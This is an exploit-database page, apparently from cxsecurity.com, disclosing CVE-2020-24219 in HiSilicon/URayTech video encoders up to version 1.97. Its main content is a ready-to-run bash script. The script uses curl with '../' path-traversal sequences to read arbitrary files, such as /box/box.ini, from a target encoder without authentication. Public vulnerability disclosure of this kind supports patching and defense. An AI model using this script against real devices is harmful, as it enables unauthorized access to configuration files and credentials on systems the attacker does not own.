HiSilicon Video Encoder 1.97 File Disclosure / Path Traversal

2020.10.19
Risk: High
Local: No
Remote: Yes
CWE: CWE-22

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: https://www.szuray.com/ # Software Link: N/A # Version: up to 1.97 # Tested on: Linux # CVE: CVE-2020-24219 # Vendors: URayTech # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "Usage: $0 <server>[:<port>] <filepath>" echo "Example: $0 1.2.3.4:8086 /box/box.ini" exit 1 fi curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \ || echo "ERROR: curl returned $?"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top